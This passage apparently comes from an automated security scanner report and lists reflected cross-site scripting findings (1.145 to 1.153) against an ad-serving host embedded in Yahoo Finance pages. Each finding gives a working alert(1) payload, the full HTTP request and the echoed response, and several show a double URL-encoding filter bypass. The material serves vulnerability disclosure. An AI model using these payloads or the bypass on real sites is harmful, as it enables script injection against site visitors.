+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830000**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=56e5b</script><script>alert(1)</script>23422258c5c&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8
...[SNIP]...

1.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256 [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf87c</script><script>alert(1)</script>02b34734fdd was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.19271962996572256?yhdata=ycg=&yyob=&zip=,bf87c</script><script>alert(1)</script>02b34734fdd&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/B=fq_KREwNPVo-/J=1300828239483003/K=9IqHXggXC7f0G5PZ2qRppg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/Buffett-looking-at-investing-rb-757353019.html;_ylt=AveahlVQa63dPFBhs1X3QukUaq9_;_ylu=X3oDMTBycmR0cDExBHBvcwMxBHNlYwN0b3BzdG9yaWVzBHNsawNGMQ--?x=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830120**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,bf87c</script><script>alert(1)</script>02b34734fdd&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n088n69/M=791401.14523143.14352822.2140147/D=fin/S=2142203389:NE3/Y=YAHOO/EXP=1300835439/L=56M0nUwNcmBqhH8YTVvEVQD.rcHW802JEE8ABJjp/
...[SNIP]...

1.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30463%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6ce9bcd3b8 was submitted in the REST URL parameter 2. This input was echoed as 30463"><script>alert(1)</script>b6ce9bcd3b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135730463%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6ce9bcd3b8/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135730463"><script>alert(1)</script>b6ce9bcd3b8/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 601bb%2522%253balert%25281%2529%252f%252f9b6ae25f873 was submitted in the REST URL parameter 2. This input was echoed as 601bb";alert(1)//9b6ae25f873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357601bb%2522%253balert%25281%2529%252f%252f9b6ae25f873/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357601bb";alert(1)//9b6ae25f873/477.0.iframe.150x30/1300830325**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14
...[SNIP]...

1.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17fda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bc31f1bcec was submitted in the REST URL parameter 3. This input was echoed as 17fda"><script>alert(1)</script>8bc31f1bcec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3017fda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8bc31f1bcec/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x3017fda"><script>alert(1)</script>8bc31f1bcec/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f254f%2522%253balert%25281%2529%252f%252f5c21c8d846b was submitted in the REST URL parameter 3. This input was echoed as f254f";alert(1)//5c21c8d846b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30f254f%2522%253balert%25281%2529%252f%252f5c21c8d846b/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30f254f";alert(1)//5c21c8d846b/1300830337**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fdca"-alert(1)-"1deab7fe4c4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*3fdca"-alert(1)-"1deab7fe4c4 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2633

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*3fdca"-alert(1)-"1deab7fe4c4">
...[SNIP]...

1.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e91ac"><script>alert(1)</script>76dc8954e3 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*e91ac"><script>alert(1)</script>76dc8954e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*e91ac"><script>alert(1)</script>76dc8954e3http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f70"-alert(1)-"b9ed1c9b4d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&d8f70"-alert(1)-"b9ed1c9b4d6=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2639

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&d8f70"-alert(1)-"b9ed1c9b4d6=1">
...[SNIP]...

1.153. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a635f"><script>alert(1)</script>475f0068cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&a635f"><script>alert(1)</script>475f0068cb6=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
